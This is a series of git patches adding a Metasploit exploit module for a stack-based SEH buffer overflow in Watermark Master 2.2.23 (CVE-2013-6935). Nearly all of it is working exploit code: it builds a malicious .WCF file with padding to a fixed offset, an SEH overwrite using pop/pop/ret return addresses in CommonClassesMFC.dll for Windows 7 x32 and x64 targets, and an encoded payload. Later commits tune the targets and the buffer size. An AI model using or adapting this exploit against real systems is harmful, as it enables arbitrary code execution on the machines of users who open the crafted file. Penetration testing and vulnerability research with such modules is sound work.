From 03eb2d71b2b65f54b270293e350713544e6c9d68 Mon Sep 17 00:00:00 2001 From: jakxx Date: Thu, 13 Aug 2015 16:26:17 -0400 Subject: [PATCH 1/7] Add watermark fileformat exploit --- .../windows/fileformat/watermark_master.rb | 93 +++++++++++++++++++ 1 file changed, 93 insertions(+) create mode 100644 modules/exploits/windows/fileformat/watermark_master.rb diff --git a/modules/exploits/windows/fileformat/watermark_master.rb b/modules/exploits/windows/fileformat/watermark_master.rb new file mode 100644 index 0000000000..fbbcb62ed9 --- /dev/null +++ b/modules/exploits/windows/fileformat/watermark_master.rb @@ -0,0 +1,93 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Watermark Master Buffer Overflow (SEH)', + 'Description' => %q{ + This module exploits a stack based buffer overflow in Watermark Master 2.2.23 when + processing a specially crafted .WCF file. This vulnerability could be + exploited by a remote attacker to execute arbitrary code on the target + machine by enticing a user of Watermark Master to open a malicious .WCF file. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'metacom', # Original discovery + 'Andrew Smith', # MSF Module + ], + 'References' => + [ + [ 'OSVDB', '99226' ], + [ 'CVE', '2013-6935'], + [ 'EBD', '29327' ] + ], + 'DefaultOptions' => + { + 'ExitFunc' => 'process', + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x0a\x0d\x3c\x22\x26", + 'DisableNops' => true, + 'Space' => 7276 + }, + + 'Targets' => + [ + [ 'Watermark Master 2.2.23', + { + 'Ret' => 0x10015f2d, #p/p/r | CommonClassesMFC.dll + 'Offset' => 516 + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Nov 1 2013', + 'DefaultTarget' => 0)) + + register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.wcf']),], self.class) + + end + + def exploit + + buffer = rand_text(target['Offset']) + buffer << generate_seh_record(target.ret) + buffer << make_nops(100) + buffer << payload.encoded + buffer << rand_text(10000) + + file = %Q| + + + + + + + + + + + + + +| + + print_status("Creating '#{datastore['FILENAME']}' file ...") + file_create(file) + + end +end + From 361624161baf06da9bdc66da0f1553d969cfb2e9 Mon Sep 17 00:00:00 2001 From: jakxx Date: Thu, 13 Aug 2015 16:27:27 -0400 Subject: [PATCH 2/7] msftidy --- modules/exploits/windows/fileformat/watermark_master.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/fileformat/watermark_master.rb b/modules/exploits/windows/fileformat/watermark_master.rb index fbbcb62ed9..cf57168fbd 100644 --- a/modules/exploits/windows/fileformat/watermark_master.rb +++ b/modules/exploits/windows/fileformat/watermark_master.rb @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote | - print_status("Creating '#{datastore['FILENAME']}' file ...") + print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(file) end From 6e1c714b2bd6b734cf312a5ae310a77239d6050b Mon Sep 17 00:00:00 2001 From: jakxx Date: Thu, 13 Aug 2015 17:24:18 -0400 Subject: [PATCH 3/7] Update to leverage auto-NOP generation --- modules/exploits/windows/fileformat/watermark_master.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/modules/exploits/windows/fileformat/watermark_master.rb b/modules/exploits/windows/fileformat/watermark_master.rb index cf57168fbd..fa01606f2b 100644 --- a/modules/exploits/windows/fileformat/watermark_master.rb +++ b/modules/exploits/windows/fileformat/watermark_master.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Payload' => { 'BadChars' => "\x00\x0a\x0d\x3c\x22\x26", - 'DisableNops' => true, + 'DisableNops' => false, 'Space' => 7276 }, @@ -65,9 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote buffer = rand_text(target['Offset']) buffer << generate_seh_record(target.ret) - buffer << make_nops(100) buffer << payload.encoded - buffer << rand_text(10000) file = %Q| From e9d3289c23c4e406cadeaf8a0e3e84ab98a364b2 Mon Sep 17 00:00:00 2001 From: jakxx Date: Thu, 13 Aug 2015 17:25:31 -0400 Subject: [PATCH 4/7] EXITFUNC caps --- modules/exploits/windows/fileformat/watermark_master.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/fileformat/watermark_master.rb b/modules/exploits/windows/fileformat/watermark_master.rb index fa01606f2b..eb1fe53cd9 100644 --- a/modules/exploits/windows/fileformat/watermark_master.rb +++ b/modules/exploits/windows/fileformat/watermark_master.rb @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DefaultOptions' => { - 'ExitFunc' => 'process', + 'EXITFUNC' => 'process', }, 'Platform' => 'win', 'Payload' => From f18e1d69a1b5390be39ed1cd9d9b47cf54771c74 Mon Sep 17 00:00:00 2001 From: jakxx Date: Tue, 29 Sep 2015 22:36:30 -0400 Subject: [PATCH 5/7] Add x64 ret address and add to buffer --- modules/exploits/windows/fileformat/watermark_master.rb | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/modules/exploits/windows/fileformat/watermark_master.rb b/modules/exploits/windows/fileformat/watermark_master.rb index eb1fe53cd9..978734151a 100644 --- a/modules/exploits/windows/fileformat/watermark_master.rb +++ b/modules/exploits/windows/fileformat/watermark_master.rb @@ -46,6 +46,12 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ + [ 'Windows 7 x32 - Watermark Master 2.2.23', + { + 'Ret' => 0x10015f2d, #p/p/r | CommonClassesMFC.dll + 'Offset' => 516 + } + ], [ 'Watermark Master 2.2.23', { 'Ret' => 0x10015f2d, #p/p/r | CommonClassesMFC.dll @@ -66,6 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote buffer = rand_text(target['Offset']) buffer << generate_seh_record(target.ret) buffer << payload.encoded + buffer << rand_text(9000) file = %Q| From 47c79071ebd1aca317ee938be6a99640384c760d Mon Sep 17 00:00:00 2001 From: jakxx Date: Tue, 29 Sep 2015 22:41:36 -0400 Subject: [PATCH 6/7] fix indention and typo --- modules/exploits/windows/fileformat/watermark_master.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/fileformat/watermark_master.rb b/modules/exploits/windows/fileformat/watermark_master.rb index 978734151a..1fbabf6716 100644 --- a/modules/exploits/windows/fileformat/watermark_master.rb +++ b/modules/exploits/windows/fileformat/watermark_master.rb @@ -46,15 +46,15 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ - [ 'Windows 7 x32 - Watermark Master 2.2.23', + [ 'Windows 7 x32 - Watermark Master 2.2.23', { 'Ret' => 0x10015f2d, #p/p/r | CommonClassesMFC.dll 'Offset' => 516 } ], - [ 'Watermark Master 2.2.23', + [ 'Windows 7 x64 - Watermark Master 2.2.23', { - 'Ret' => 0x10015f2d, #p/p/r | CommonClassesMFC.dll + 'Ret' => 0x1001329a, #p/p/r | CommonClassesMFC.dll 'Offset' => 516 } ], From c5237617f249c3633ed635898fea68d9745fc5d8 Mon Sep 17 00:00:00 2001 From: jakxx Date: Tue, 6 Oct 2015 18:12:40 -0400 Subject: [PATCH 7/7] Update buffer size for reliability --- modules/exploits/windows/fileformat/watermark_master.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/fileformat/watermark_master.rb b/modules/exploits/windows/fileformat/watermark_master.rb index 1fbabf6716..af6a94c36b 100644 --- a/modules/exploits/windows/fileformat/watermark_master.rb +++ b/modules/exploits/windows/fileformat/watermark_master.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote buffer = rand_text(target['Offset']) buffer << generate_seh_record(target.ret) buffer << payload.encoded - buffer << rand_text(9000) + buffer << rand_text(18000 - buffer.length) file = %Q|